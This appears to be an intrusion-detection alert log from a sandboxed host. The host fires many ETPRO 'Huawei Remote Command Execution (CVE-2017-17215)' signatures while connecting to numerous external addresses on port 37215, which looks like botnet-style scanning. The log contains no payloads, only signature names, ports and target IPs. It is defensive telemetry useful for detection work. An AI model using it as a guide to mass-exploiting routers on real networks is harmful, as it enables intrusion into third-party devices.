                                                    07/10/24-08:27:00.476380TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5526837215192.168.2.1441.230.0.107
                                                    07/10/24-08:26:26.562262TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4787037215192.168.2.14157.203.5.135
                                                    07/10/24-08:26:28.924774TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3972237215192.168.2.1457.19.166.91
                                                    07/10/24-08:27:23.838490TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4674437215192.168.2.1441.114.215.166
                                                    07/10/24-08:27:34.131250TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4457437215192.168.2.14157.10.189.80
                                                    07/10/24-08:26:17.985720TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5884037215192.168.2.1435.127.224.19
                                                    07/10/24-08:26:20.172014TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4892237215192.168.2.14157.207.137.196
                                                    07/10/24-08:27:24.948022TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4351237215192.168.2.14197.254.114.88
                                                    07/10/24-08:26:47.901324TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5672837215192.168.2.14157.5.10.120
                                                    07/10/24-08:26:33.234829TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5874637215192.168.2.14157.61.16.193
                                                    07/10/24-08:27:08.325316TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5593837215192.168.2.14197.243.205.160
                                                    07/10/24-08:26:28.907657TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5509837215192.168.2.14167.6.91.148
                                                    07/10/24-08:27:10.672315TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4296637215192.168.2.14151.216.12.56
                                                    07/10/24-08:26:22.300900TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4781037215192.168.2.1441.70.172.99
                                                    07/10/24-08:26:26.591446TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5717437215192.168.2.14157.19.126.197
                                                    07/10/24-08:26:13.790493TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3280837215192.168.2.14197.36.209.238
                                                    07/10/24-08:26:26.605187TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4398237215192.168.2.1441.45.243.93
                                                    07/10/24-08:27:28.130365TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3852837215192.168.2.14197.117.178.219
                                                    07/10/24-08:27:32.562679TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5527837215192.168.2.14197.2.24.119
                                                    07/10/24-08:27:27.165580TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5281837215192.168.2.14197.223.34.196
                                                    07/10/24-08:26:55.413827TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5495637215192.168.2.1441.208.189.214
                                                    07/10/24-08:27:22.810780TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5249837215192.168.2.14157.7.226.7
                                                    07/10/24-08:26:28.761940TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4034437215192.168.2.14157.187.54.233
                                                    07/10/24-08:26:57.657742TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4639237215192.168.2.14157.119.254.103
                                                    07/10/24-08:26:23.302644TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5893437215192.168.2.1441.255.77.45
                                                    07/10/24-08:27:10.619172TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3375837215192.168.2.1441.146.99.109
                                                    07/10/24-08:27:20.470099TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3844237215192.168.2.14197.174.18.126
                                                    07/10/24-08:26:59.661744TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6015837215192.168.2.1441.151.104.76
                                                    07/10/24-08:26:28.917896TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4748637215192.168.2.1441.117.65.176
                                                    07/10/24-08:27:13.859325TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4929837215192.168.2.14157.247.16.136
                                                    07/10/24-08:27:27.080218TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5134037215192.168.2.14157.0.36.225
                                                    07/10/24-08:26:47.918271TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4226837215192.168.2.14157.228.36.123
                                                    07/10/24-08:27:14.017711TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4426837215192.168.2.1434.164.215.166
                                                    07/10/24-08:26:29.849427TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5852237215192.168.2.14197.9.135.239
                                                    07/10/24-08:26:15.868019TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4786837215192.168.2.14157.226.66.176
                                                    07/10/24-08:27:05.133691TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3546637215192.168.2.1441.182.151.43
                                                    07/10/24-08:27:31.555849TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4990037215192.168.2.14197.119.210.195
                                                    07/10/24-08:26:18.001576TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5042237215192.168.2.14157.179.247.157
                                                    07/10/24-08:26:55.313127TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3454837215192.168.2.14130.133.41.0
                                                    07/10/24-08:26:59.648560TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3608837215192.168.2.14157.172.226.149
                                                    07/10/24-08:26:17.990229TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5578837215192.168.2.14197.107.169.48
                                                    07/10/24-08:27:28.074173TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4679637215192.168.2.14157.233.85.115
                                                    07/10/24-08:27:02.784387TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4887837215192.168.2.1488.71.120.40
                                                    07/10/24-08:26:36.346095TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4608037215192.168.2.14197.77.253.151
                                                    07/10/24-08:26:25.492414TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4361437215192.168.2.14135.149.8.144
                                                    07/10/24-08:26:57.514091TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4688237215192.168.2.14197.188.121.55
                                                    07/10/24-08:26:23.347149TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5096437215192.168.2.1441.232.187.247
                                                    07/10/24-08:27:10.668582TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3988037215192.168.2.1446.48.111.225
                                                    07/10/24-08:27:13.857998TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3728637215192.168.2.1441.103.6.38
                                                    07/10/24-08:26:23.340095TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6060437215192.168.2.14197.68.153.160
                                                    07/10/24-08:26:20.144044TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5856837215192.168.2.14119.55.31.236
                                                    07/10/24-08:26:47.978866TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4572837215192.168.2.14157.88.103.104
                                                    07/10/24-08:27:19.353550TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4626437215192.168.2.1441.76.184.61
                                                    07/10/24-08:26:43.631742TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5420837215192.168.2.14157.192.189.53
                                                    07/10/24-08:26:23.322732TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5311637215192.168.2.1441.112.19.247
                                                    07/10/24-08:26:26.592095TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5042637215192.168.2.14157.75.82.54
                                                    07/10/24-08:26:59.575618TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5820037215192.168.2.1441.139.170.89
                                                    07/10/24-08:27:27.174460TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4370837215192.168.2.14197.255.188.154
                                                    07/10/24-08:27:24.953647TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3282837215192.168.2.1412.10.52.216
                                                    07/10/24-08:26:33.217883TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4779037215192.168.2.148.194.50.232
                                                    07/10/24-08:27:27.143862TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4961237215192.168.2.14157.147.40.75
                                                    07/10/24-08:26:25.502478TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3910037215192.168.2.14150.13.84.184
                                                    07/10/24-08:26:34.242772TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4888637215192.168.2.1441.212.214.9
                                                    07/10/24-08:26:15.858543TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5787637215192.168.2.1439.190.170.193
                                                    07/10/24-08:26:47.974883TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5477437215192.168.2.14197.83.173.83
                                                    07/10/24-08:27:08.398717TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5309037215192.168.2.1441.101.164.75
                                                    07/10/24-08:26:14.622607TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4657037215192.168.2.14197.242.193.248
                                                    07/10/24-08:26:28.878894TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5581037215192.168.2.1441.102.165.146
                                                    07/10/24-08:26:49.828950TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5156037215192.168.2.1441.213.165.240
                                                    07/10/24-08:27:22.831755TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4861437215192.168.2.14125.104.126.171
                                                    07/10/24-08:26:22.211472TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5589837215192.168.2.1461.228.105.1
                                                    07/10/24-08:26:49.902162TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3799437215192.168.2.1441.167.29.215
                                                    07/10/24-08:26:57.602655TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4553437215192.168.2.14176.59.154.120
                                                    07/10/24-08:26:13.822021TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5875637215192.168.2.1441.31.100.2
                                                    07/10/24-08:26:25.443386TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4187037215192.168.2.1441.204.178.112
                                                    07/10/24-08:26:57.658066TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5822837215192.168.2.14124.58.172.167
                                                    07/10/24-08:27:30.525372TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4041037215192.168.2.14157.108.112.45
                                                    07/10/24-08:27:33.956245TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5233037215192.168.2.14157.197.76.230
                                                    07/10/24-08:26:25.486715TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4760237215192.168.2.14197.0.82.158
                                                    07/10/24-08:26:53.196604TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5527437215192.168.2.14157.177.173.220
                                                    07/10/24-08:27:05.181070TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5883837215192.168.2.1442.59.230.84
                                                    07/10/24-08:27:19.286417TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4260637215192.168.2.14197.170.242.166
                                                    07/10/24-08:27:05.219049TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5296037215192.168.2.14197.202.19.128
                                                    07/10/24-08:26:49.795312TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5132237215192.168.2.1441.86.133.19
                                                    07/10/24-08:27:31.550771TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3396437215192.168.2.1441.233.196.203
                                                    07/10/24-08:26:18.005995TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3733837215192.168.2.1441.186.215.206
                                                    07/10/24-08:26:28.804667TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5944837215192.168.2.14197.175.103.190
                                                    07/10/24-08:27:08.373909TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4118037215192.168.2.14197.123.49.58
                                                    07/10/24-08:26:22.264063TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4958837215192.168.2.1441.213.15.169
                                                    07/10/24-08:26:20.126065TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3572837215192.168.2.14157.26.44.48
                                                    07/10/24-08:26:48.007312TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3400237215192.168.2.14191.19.221.111
                                                    07/10/24-08:27:22.539034TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3857837215192.168.2.14197.173.201.93
                                                    07/10/24-08:26:17.997408TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5374237215192.168.2.1441.184.126.45
                                                    07/10/24-08:26:51.964382TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4911237215192.168.2.14197.62.8.84
                                                    07/10/24-08:26:59.816598TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5733837215192.168.2.141.159.148.192
                                                    07/10/24-08:26:55.297607TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5432637215192.168.2.1473.141.246.51
                                                    07/10/24-08:26:49.920936TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4469037215192.168.2.1441.253.213.88
                                                    07/10/24-08:26:41.558388TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5616437215192.168.2.14197.212.163.131
                                                    07/10/24-08:26:45.603394TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5321237215192.168.2.14197.106.25.124
                                                    07/10/24-08:26:43.714362TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5505037215192.168.2.14197.114.19.215
                                                    07/10/24-08:26:48.013937TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4834437215192.168.2.1441.132.196.196
                                                    07/10/24-08:26:31.078993TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4173037215192.168.2.14175.221.112.34
                                                    07/10/24-08:26:22.298145TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6097637215192.168.2.14197.193.104.134
                                                    07/10/24-08:27:11.612817TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3814637215192.168.2.1441.103.197.20
                                                    07/10/24-08:26:45.690797TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4067437215192.168.2.14197.56.39.220
                                                    07/10/24-08:26:14.808084TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3478237215192.168.2.14157.252.120.183
                                                    07/10/24-08:26:57.498447TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3429037215192.168.2.14197.14.115.146
                                                    07/10/24-08:27:19.309217TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5114037215192.168.2.145.69.125.71
                                                    07/10/24-08:26:13.794685TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3355037215192.168.2.1441.136.250.104
                                                    07/10/24-08:26:49.876942TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3356237215192.168.2.14157.5.232.214
                                                    07/10/24-08:26:38.543702TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5536037215192.168.2.14197.231.222.161
                                                    07/10/24-08:26:13.761894TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5899837215192.168.2.14157.163.102.21
                                                    07/10/24-08:26:53.192940TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6045637215192.168.2.14103.147.172.215
                                                    07/10/24-08:27:11.522435TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5192637215192.168.2.14157.1.214.151
                                                    07/10/24-08:27:13.761850TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5146037215192.168.2.14157.175.150.16
                                                    07/10/24-08:27:13.876445TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5074637215192.168.2.14157.123.36.150
                                                    07/10/24-08:26:45.612875TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3684037215192.168.2.14157.12.157.218
                                                    07/10/24-08:26:11.115626TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4644037215192.168.2.14157.158.61.103
                                                    07/10/24-08:27:30.486593TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5021437215192.168.2.1441.83.144.5
                                                    07/10/24-08:26:29.808403TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5189637215192.168.2.14197.102.151.126
                                                    07/10/24-08:27:14.888745TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3735637215192.168.2.14197.81.100.185
                                                    07/10/24-08:26:20.182114TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4590237215192.168.2.14136.164.156.252
                                                    07/10/24-08:26:36.308740TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4022837215192.168.2.14122.247.236.212
                                                    07/10/24-08:27:33.761946TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5560237215192.168.2.14157.71.60.193
                                                    07/10/24-08:27:05.183649TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5468437215192.168.2.1448.91.84.131
                                                    07/10/24-08:26:31.110610TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5068637215192.168.2.14157.103.134.156
                                                    07/10/24-08:27:33.759873TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4602037215192.168.2.14123.223.17.90
                                                    07/10/24-08:26:43.881227TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5598837215192.168.2.14157.118.115.30
                                                    07/10/24-08:26:51.924375TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5435637215192.168.2.14197.108.108.255
                                                    07/10/24-08:26:59.593100TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3450637215192.168.2.1441.52.75.55
                                                    07/10/24-08:26:59.765142TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4400437215192.168.2.1441.160.150.115
                                                    07/10/24-08:26:43.932722TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4157237215192.168.2.14192.182.130.91
                                                    07/10/24-08:26:41.568128TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4024237215192.168.2.14121.193.128.138
                                                    07/10/24-08:27:13.750468TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4745837215192.168.2.1441.67.135.4
                                                    07/10/24-08:27:08.448133TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4652437215192.168.2.14112.185.36.117
                                                    07/10/24-08:26:38.546157TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3872237215192.168.2.1441.112.114.74
                                                    07/10/24-08:26:34.209282TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3974837215192.168.2.14197.12.183.59
                                                    07/10/24-08:26:59.642670TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3576837215192.168.2.14157.188.4.120
                                                    07/10/24-08:27:05.176375TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4036837215192.168.2.1441.203.155.20
                                                    07/10/24-08:26:52.069901TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3416237215192.168.2.14197.115.158.233
                                                    07/10/24-08:26:20.102730TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4268837215192.168.2.1463.22.217.121
                                                    07/10/24-08:27:22.763927TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4556837215192.168.2.14197.113.141.14
                                                    07/10/24-08:27:07.268531TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4316437215192.168.2.1441.195.86.72
                                                    07/10/24-08:27:28.055753TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4988837215192.168.2.14157.32.160.236
                                                    07/10/24-08:26:20.190530TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5529437215192.168.2.1434.232.44.159
                                                    07/10/24-08:26:43.865375TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4737037215192.168.2.1441.225.74.39
                                                    07/10/24-08:26:23.359081TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3488437215192.168.2.142.21.143.31
                                                    07/10/24-08:26:33.252129TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3585037215192.168.2.14157.81.56.200
                                                    07/10/24-08:26:38.584123TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4807037215192.168.2.1441.200.79.194
                                                    07/10/24-08:26:43.776832TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4913837215192.168.2.14157.104.75.212
                                                    07/10/24-08:26:20.187450TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3339037215192.168.2.1441.39.160.65
                                                    07/10/24-08:27:03.000595TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4485237215192.168.2.14157.33.67.69
                                                    07/10/24-08:26:57.581660TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3436837215192.168.2.14202.166.96.73
                                                    07/10/24-08:27:13.890011TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4836237215192.168.2.1441.118.14.244
                                                    07/10/24-08:26:25.520739TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4208437215192.168.2.1441.121.218.218
                                                    07/10/24-08:26:47.979211TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5322237215192.168.2.1457.218.243.164
                                                    07/10/24-08:27:19.253799TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4951437215192.168.2.14197.129.4.196
                                                    07/10/24-08:26:41.511633TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5968437215192.168.2.14197.174.121.255
                                                    07/10/24-08:26:51.983078TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3504837215192.168.2.14157.76.101.187
                                                    07/10/24-08:26:18.003273TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4079437215192.168.2.14197.38.81.95
                                                    07/10/24-08:27:13.752380TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5307037215192.168.2.1441.127.195.204
                                                    07/10/24-08:27:02.800250TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4604637215192.168.2.1441.230.43.119
                                                    07/10/24-08:27:22.527707TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3956837215192.168.2.14197.249.51.112
                                                    07/10/24-08:27:13.974355TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5783237215192.168.2.14136.170.173.7
                                                    07/10/24-08:27:22.802348TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3988437215192.168.2.14197.0.3.31
                                                    07/10/24-08:26:17.976557TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6005837215192.168.2.14197.92.53.137
                                                    07/10/24-08:26:17.937591TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4905437215192.168.2.14211.149.37.182
                                                    07/10/24-08:26:59.828801TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4472037215192.168.2.14157.123.99.64
                                                    07/10/24-08:27:08.383714TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5707637215192.168.2.14197.189.111.174
                                                    07/10/24-08:26:22.282645TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4691637215192.168.2.14197.20.131.136
                                                    07/10/24-08:26:34.201699TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5008037215192.168.2.14182.225.142.153
                                                    07/10/24-08:26:43.893458TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3946837215192.168.2.1441.84.206.64
                                                    07/10/24-08:26:34.238567TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3433437215192.168.2.1441.92.147.31
                                                    07/10/24-08:26:51.979400TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5720437215192.168.2.14197.209.168.218
                                                    07/10/24-08:26:59.639187TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4461237215192.168.2.1441.174.48.145
                                                    07/10/24-08:27:33.907934TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5722637215192.168.2.14197.77.170.174
                                                    07/10/24-08:27:19.287568TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5081037215192.168.2.14163.130.38.100
                                                    07/10/24-08:27:20.477524TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4946037215192.168.2.1452.98.237.149
                                                    07/10/24-08:26:43.655197TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5863237215192.168.2.1441.152.155.231
                                                    07/10/24-08:27:10.547340TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3568837215192.168.2.1441.246.17.113
                                                    07/10/24-08:27:14.836980TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3522637215192.168.2.14157.49.25.211
                                                    07/10/24-08:27:13.883057TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6094037215192.168.2.14157.94.31.210
                                                    07/10/24-08:26:49.811589TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3788237215192.168.2.14197.20.221.174
                                                    07/10/24-08:27:31.473922TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5296437215192.168.2.1454.105.151.126
                                                    07/10/24-08:26:57.633994TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4053637215192.168.2.14197.60.236.169
                                                    07/10/24-08:26:28.912225TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3958437215192.168.2.14139.71.10.219
